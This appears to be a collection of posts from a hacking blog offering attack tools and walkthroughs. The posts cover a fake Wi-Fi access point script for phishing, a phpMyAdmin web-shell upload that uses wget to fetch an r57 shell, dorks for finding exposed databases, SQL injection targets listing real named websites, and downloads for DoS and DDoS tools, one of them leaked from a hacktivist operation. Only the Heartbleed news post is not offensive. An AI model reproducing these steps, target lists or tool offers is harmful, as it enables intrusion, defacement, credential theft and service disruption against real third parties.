PwnSTAR: Pwn Soft Ap Script For Hacking

It is basically a bash script to launch a Fake AP, configurable with a wide variety of attack options. Includes a number of index.html and server php scripts, for sniffing and phishing.Can act as multi-client captive portal using php and iptables.

Launches classic exploits such as evil-PDF.An easy way to launch the "best" metasploit modules eg CVE-2013-0422 De-auth with aireplay, airdrop-ng or MDK3.

Few Top features:-
1). Takes care of configuration of interfaces, macspoofing, airbase-ng and isc-dhcp-server
2). Steals WPA handshakes
3). Phishes email credentials
4). Serves webpages: supplied (eg hotspot, below) or provide your own
5). Sniffing with ferret and sslstrip
6). Adds a captive portal to the frontend of the fake AP
7). Assorted exploits
8). De-auth with MDK3, aireplay-ng or airdrop-ng
9). Use your imagination, craft your own webpages, and have fun.

Download Package contents:
-"Hotspot_3" is a simple phishing web page, used with basic menu option 4.
-"Portal_simple" is a captive portal which allows you to edit the index.html with the name of the portal

                    Example:- "Joe's CyberCafe". It is used for Sniffing.
-"Portal_hotspot3" phishes credentials, and then allows clients through the portal to the internet.
-"Portal_pdf" forces the client to download a malicious pdf in order to pass through the portal.
-Designed for Kali-linux and BackTrack5 ,Current version for Kali is PwnSTAR_0.9.

PwnSTAR.tgz is a bundle containing the current version of the script + all required webpages.

Download:-

Click Here

Installation process:-

1). It is simple to install and use. download from above link and then follow the screenshot.

2). And Main menu is this-->

Keep checking Hackers-Store for upcoming tutorial on PwnSTAR.

Read more

Upload Shell And Deface Via PhpmyAdmin

Earlier I have posted About How to get Acess to PhpmyAdmin without login through google dorks. As i promised I will post about how to deface using PhpmyAdmin. So here it is Lets start...
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Requirements(All You Need):-
-You must have the full path 

- pma & mysql db privileges. 

Follow the Instructions:-

1). First login in to mysql. Or you can use these dorks also CLICK HERE.

2). Now click 'Show MySQL system varible" then 'SQL' . Now you can run sql commands,like create db, delete tables or whatever. We want to upload shell so lets move on to it. 

3). Now we will create a cmd line into a new file,with select into. SELECT "" INTO OUTFILE "full/path/here/cmd.php" and click 'Go'. 

4). Now, the cmd line is here http://site.com/cmd.php lets run the command to get shell. wget http://www.r57.biz /r57.txt;mv r57.txt shell.php. Thats all then we av the shell on the site!!..!

Read more

PhpmyAdmin Exploit with Google Dorks

Hello Reader! Today Im going to show you how to exploit PHPmyAdmin with google Dorks. You dont nedd to do any thing no login nothing just put the dork and open any site you will directly go to PHPmyAdmin :).. So let's Start...

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-
1). Enter the following Dork in Google.

Dork: allinurl:index.php?db=information_schema

2). It will show you about 80,800 Results. So now you can guess how many Vuln  sites are there :D..Open any site you will redirect to PHPmyAdmin...:D

This dork bypasses the admin username and pass and takes You directly to information schema tables to get data and You can delete data

Learn To Deface VIA PhpmyAdmin:-
How to deface using PHPmyAdmin..

Hope you all are enjoying my blog posts...If you like our tutorials please leave valuable comments ...

Read more

Android Devices Are Vulnerable To Heartbleed Bug

Many Android Devices Are Vulnerable To Heartbleed Bug. Google recently reported that Android OS are vulnerable to Heartbleed Bug.

According to Google online security blog,
"We’ve assessed this vulnerability and applied patches to key Google services such as Search, Gmail, YouTube, Wallet, Play, Apps, and App Engine.  Google Chrome and Chrome OS are not affected. We are still working to patch some other Google services. We regularly and proactively look for vulnerabilities like this -- and encourage others to report them -- so that that we can fix software flaws before they are exploited.

If you are a Google Cloud Platform or Google Search Appliance customer, or don’t use the latest version of Android, here is what you need to know.

Cloud SQL
We are currently patching Cloud SQL, with the patch rolling out to all instances today and tomorrow. In the meantime, users should use the IP whitelisting function to ensure that only known hosts can access their instances.

Android
All versions of Android are immune to CVE-2014-0160 (with the limited exception of Android 4.1.1; patching information for Android 4.1.1 is being distributed to Android partners."

What is Heartbleed Bug?
The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software.

The Heartbleed vulnerability exposed this week. Bug effected OpenSSL versions released in past two years. In vulnerable system, hackers can collect all encrypted data from a website's server before its deleted can say Zero day vulnerability.

According to report WSJ, Donations have picked up since Monday. This week, it had raised $841.70 as of Wednesday afternoon.

Check your server for Heartbleed Bug causing.
http://filippo.io/Heartbleed/
Enter a URL or a hostname to test the server for CVE-2014-0160

What is the CVE-2014-0160?
CVE-2014-0160 is the official reference to this bug. CVE (Common Vulnerabilities and Exposures) is the Standard for Information Security Vulnerability. 

Security Notice:

Some are websites also affected by Heartbleed Bug. You should change the passwords of your Email and Social Network accounts now. Mashable noticed Heartbleed hit list website affected.

Source:-igadgetware.com

Read more

Hack Website using Android Phone - Droidsqli

Hello Guys, today we talk about how to hacked a website using your Android phone.We know that in the world 70% website hacked by using SQL injection. For automate SQL injection We need tool or OS - back track, havij or Kali, and etc..But now you can attack on site using your android mobile phone and Tables and hack website using a Android App called Droidsqli.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Only you need 3 things:-
1). SQL Vulnerable site:- Learn to find Vuln sites
2). android mobile
3). Droidsqli tool:- Download Here

What is DroidSQLi?
DroidSQLi is the first automated MySQL Injection tool for Android. It allows you to test your MySQL-based web application against SQL injection attacks.

Download(MediaFire):-

http://sh.st/wi81y

Password:- hackers-store.blogspot.com

How to use it?
Itz pretty simple actually coz all the process are done automated here.
All you need to do is find a vulnerable url and put it on Target URL and touch Inject
You will be getting data base and all server info .

DroidSQLi supports the following injection techniques:

• Time based injection
• Blind injection
• Error based injection
• Normal injection

It automatically selects the best technique to use and employs some simple filter evasion methods..! :)

Know more about SqlInjection ..
I am sure you will enjoy using this tool have fun and thanks again.

Read more

PHP Dos/DDoS Script (Dos Attack Tool)

Hello Readers, Today Im going to share a amazing PHP tool with you. This is one of the advanced tool of website crashing known as PHP Dos Attack Script. Simply download the file, unzip and upload the files to your web host.

FUNCTIONS:-

ddos script,php dos,php ddos script,php dos script,ddos php script,ddos php script,mysql ddos
ddos script php,phpDos,ddos scripts,script DDOS,php ddos,ddos php,denial of service script
dos php,ddos attack script,php ddoser,script php ddos,dos php script,php script ddos
php DDos attack script,script ddos php,PHP DoS Script by Exe,ddos,php dos by exe,ddos script

DENIAL OF SERVICE :-

php script,php ddos attack,php ddos download,download script ddos,ddos online
denial of service scripts,PHP DoS/DDoS (Denial Of Service) Script,ddos php tool
php curl ddos,ddos php scripts,script ddos attack,dos script denial,
php Dos scripts,php denial of service

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Full PHP-DOS-ATTACKER script including:

1). index.php
2). functions.php
3). main.jpg

Information provided on this blog is for purposes only!The author should not be held responsible! Use content and tools on this blog/site is your own RISK!!  

Download(MediaFire):-

http://sh.st/wiUmd

Password: hackers-store.blogspot.com

Read more

0Day Smokybyte SQL Injection Vulnerability 2016

[~] Exploit Title: Smokybyte SQL Injection Vulnerability
[~] Google Dork: intext:"Site by Smokybyte"
[~] Date: 08/04/2014
[~] Exploit Author: Tw-Root [ RedKit ]
[~] Tested on: Windows 7 and 8

Updated! 2016

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

[+] SQLi Exploit : Http://WebSite.Com/[path]/***.php?id=[SQLi]

[+] Demo : http://www.gcircuit.com/gallery-de.php?id=[SQLi]

Order Demos : 

http://www.kantanamotionpictures.com/equ...hp?ic=%271
http://www.bigbluethai.com/popup_clients.php?ic=%2714
http://www.engcorp.co.th/newsDetail.asp?NewsID=%2712
http://www.bangkoksculpturecenter.org/ne...278&Page=1
http://www.pisutshop.com/webboard_detail...ID=%272671
http://www.941hotel.com/newsAndEvent_De.php?id=%274
http://www.satirathai.com/collection.php?ic=%273
http://mscsittipol.com/helpDesk_Cate.php?q=%272

Read more

AnonGhost Private DDoser 2.00 2014

Hello Readers, Today I got a wonderful tool. So I thought of sharing it with you all. Wanna know what is it?....Yeah! its AnonGhost Private DDoser 2.00 tool. They created it for Birthday #OPISRAIL 2014

|| More Information ||

Its a very powerful DDoser and also a private tool. Only available for AnonGhost Crew members. But I am Leaking this out :) :D. Its Free for all Exclusively by Hackers Store. Download this way ...

NOTE:-You will need Microsoft .NetFarmeWork v4 or higher to run this file. Download it from Here..

↓↓           ↓↓

http://sh.st/wrk8r

Download(Mediafire):- 

http://sh.st/wrkj8

Password:- hackers-store.blogspot.com

Hope you loved this amazing post, please like this post for our appreciation. Thanks for visiting Hackers Store

Read more